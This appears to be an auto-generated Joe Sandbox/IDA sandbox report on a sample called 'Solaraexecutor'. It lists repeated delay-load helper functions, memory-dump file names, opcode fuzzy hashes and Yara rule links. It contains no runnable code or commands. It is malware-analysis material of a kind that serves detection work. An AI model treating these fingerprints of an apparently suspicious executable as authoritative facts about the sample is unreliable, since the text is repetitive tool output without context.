Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d62e74fbac6f03b94f347433aaee44c169408860ddf966678a5b4cf8a594e13f
Instruction ID: 4ce23211a36fd80e611dfc711504904ca038da1d0051c763762ee5f989e740f7
Opcode Fuzzy Hash: d62e74fbac6f03b94f347433aaee44c169408860ddf966678a5b4cf8a594e13f
Instruction Fuzzy Hash: 06B012E1669300EC3104E1451D06C37038CC0C0F11B30403EFC09C01C0EC40AD090571

Function 00D3E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b4718593652834b110e6df595d34bf34d8be23e608a174984dd2ba0cf2d672ab
Instruction ID: 2824355e78ee1a6e43e61ca1dfb930318b6b56572def3863478b53080aaf931b
Opcode Fuzzy Hash: b4718593652834b110e6df595d34bf34d8be23e608a174984dd2ba0cf2d672ab
Instruction Fuzzy Hash: F2B012E166A340FC3148A2455C06C37030DC0C0F11B30413EFC09C01C0E840AC4C0671

Function 00D3E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bde9523ecbffd47214c0e0bd3dd5289c2a479db86ed6681bd52ee6b2c2cab256
Instruction ID: a7173792fc9f41a1b1c85ed93ec3798a45311ceb2394c5e61cf9a4851d0eda8a
Opcode Fuzzy Hash: bde9523ecbffd47214c0e0bd3dd5289c2a479db86ed6681bd52ee6b2c2cab256
Instruction Fuzzy Hash: B2B012D166A340EC3108A1451C06C37030DC0C1F11B30803EFC09C01C0E840EC080571

Function 00D3E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60688deb00e71467bc0974a0beb5e7f7377e37475f6792b925d7c739a55ebaf0
Instruction ID: 2fb6b4f0a5f672f644d17ff1fa308156a169908b6cdf8dd6a88c825c7eb1b346
Opcode Fuzzy Hash: 60688deb00e71467bc0974a0beb5e7f7377e37475f6792b925d7c739a55ebaf0
Instruction Fuzzy Hash: 1AB012D167A340EC3108A1851C06C37034DC4C0F11B30403EFC0AC01C0E840AC080571

Function 00D3E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60bee10e75c7a633c20a4691142223839f0950a0babfa015ac73671c27439828
Instruction ID: 808eb1a3d23a786a4014852b396cc0fff879a84ae7a9e599937ed92b10da3366
Opcode Fuzzy Hash: 60bee10e75c7a633c20a4691142223839f0950a0babfa015ac73671c27439828
Instruction Fuzzy Hash: E3B012D1669300EC3104E1551C06C37034CC0C1F11730803EFC09C01C0E840EC080571

Function 00D3E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1d4eb4f3feecc3e79c5ada1876c65ee7af2e72278735e3bc50566e4488da008f
Instruction ID: 85cdc6d2073268c7b16624bc6327dc866cc6d9f1299227638bd73e01ce9eae33
Opcode Fuzzy Hash: 1d4eb4f3feecc3e79c5ada1876c65ee7af2e72278735e3bc50566e4488da008f
Instruction Fuzzy Hash: 99B012E1669300FC3104A1451C06C37030DC0C1F11730803EFC09C01C0E840ED080571

Function 00D3E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0561c08e3243debbf603fec6435a67b0242e55f4e0650af4391849809da4eceb
Instruction ID: be6230b23f00cf577a9477480bf9c16fe1816d7294bf3a9ced8de0108bb5165d
Opcode Fuzzy Hash: 0561c08e3243debbf603fec6435a67b0242e55f4e0650af4391849809da4eceb
Instruction Fuzzy Hash: 77B012D1769340FC3144A2455C06C3B030CC0C0F11730813EFC1DC02C0E840AC4C0671

Function 00D3E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6ec8439cb7fb2a0ac27a55074424121d646a97685ad1ae9cd43ac72b641cfb36
Instruction ID: 12ad5aed4f52d8450f5598c4f758f67e906be3af6372781ea6a300f19859a4ba
Opcode Fuzzy Hash: 6ec8439cb7fb2a0ac27a55074424121d646a97685ad1ae9cd43ac72b641cfb36
Instruction Fuzzy Hash: 34B012D1669300EC3104A2451D06C3B030CC0C0F11730803EFC0DC02C0EC50AD0D0571

Function 00D3E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ab10093dce4a290978084f2d0c7f67ac3c375afbccbb7fdba6ea2709d75eb4b2
Instruction ID: 6b62bf28f10ccfa7f8d2ae21d8fcd657cc5f6967e16fc27d1d61d66c5a56f3ac
Opcode Fuzzy Hash: ab10093dce4a290978084f2d0c7f67ac3c375afbccbb7fdba6ea2709d75eb4b2
Instruction Fuzzy Hash: 66B012E1669300EC3104A1451D06C37030DC0C0F11730403EFC09C01C0EC40AE090571

Function 00D3E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c74d51b700d514e4a94edb1d8b333ddf51c464900978b7f167e97f643ab3d34
Instruction ID: f5423338985b367f1ff649b29991d59a3a673a9142b41992308db6e326c7a4e2
Opcode Fuzzy Hash: 3c74d51b700d514e4a94edb1d8b333ddf51c464900978b7f167e97f643ab3d34
Instruction Fuzzy Hash: 42B012E1669300EC3104A1461C06C37030DC0C0F11730403EFC09C01C0E840AD080571

Function 00D3E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8429763b93a8fd3c4a31579ef5b944a924d73a2a5f0053bf24223e29c53652f9
Instruction ID: 06ce8906823d4f28c57ab0d874e4c716337706afd40f3da9f27604dc1b9f635d
Opcode Fuzzy Hash: 8429763b93a8fd3c4a31579ef5b944a924d73a2a5f0053bf24223e29c53652f9
Instruction Fuzzy Hash: 72B012E1669300FC3144A1455C06C37030DC0C0F11B30413EFC09C01C0E840AD480671

Function 00D3E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1349c79a9cf3f04582cd6958e968dd39e628706c47fa45c3e4b7b1d0d87214e2
Instruction ID: 344f68b676b0d0b61c3525e5979a26c2480aafe1254e7f6119e3a67fd0e12fc1
Opcode Fuzzy Hash: 1349c79a9cf3f04582cd6958e968dd39e628706c47fa45c3e4b7b1d0d87214e2
Instruction Fuzzy Hash: B3B012E226C200FC3104A1041C02C3B034CC0C1F13730D02EFC08E11C0D8408D0D0573

Function 00D3E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fb2e139bbfe4a7992cd4e67b7f903d45be0be9917f04e5cdbe57325e8965b9ce
Instruction ID: 171b4388305187b29a59edb87960a48ff19c82c6aa727546a6ba6cf22eed1e5c
Opcode Fuzzy Hash: fb2e139bbfe4a7992cd4e67b7f903d45be0be9917f04e5cdbe57325e8965b9ce
Instruction Fuzzy Hash: E1B012E226C200BC310461041D02C3B434CC0C1F13730D02EFD08E51C0D8404D0E0573

Function 00D3E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E3FC

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 28b11a2485631fd90a974c435cf9c8e9bd6cab51754aa091c061aef9eb4258f8
Instruction ID: 9a54e6e7b1bcf50d2892e3034467313a6ff697b344b00cf7544f3c0872ceacb3
Opcode Fuzzy Hash: 28b11a2485631fd90a974c435cf9c8e9bd6cab51754aa091c061aef9eb4258f8
Instruction Fuzzy Hash: F6B012F226C100FC3104A1045C02C37034CC0C1F17730902EFC08D11C0D8408F090573

Function 00D3E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E580

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7038d3a2eaae76bb51ff0392594e43a1cb503388bdc484886b7a4eb9a9373b1
Instruction ID: 50189eb247403f532ecb5c9ce667254bd1bb53837c10dc936e14200718d52d8a
Opcode Fuzzy Hash: a7038d3a2eaae76bb51ff0392594e43a1cb503388bdc484886b7a4eb9a9373b1
Instruction Fuzzy Hash: 69B012C166C210BE310462551C06C37034CC0C0F15730502EFC08C11C0E8404D080571

Function 00D3E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E580

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 56a390a054ac1fb2e10e6eda911be2aed4a9341a06a8403fa84a895821f5a685
Instruction ID: 14b5f4f68829311540f67f60f4446a4578c4e24c6e3b7abe2cdb12ce17722260
Opcode Fuzzy Hash: 56a390a054ac1fb2e10e6eda911be2aed4a9341a06a8403fa84a895821f5a685
Instruction Fuzzy Hash: 02B012C166C310BC314461549C07C37035CC0C0F15730522EFC08C11C0E8404D480671

Function 00D3E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E580

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
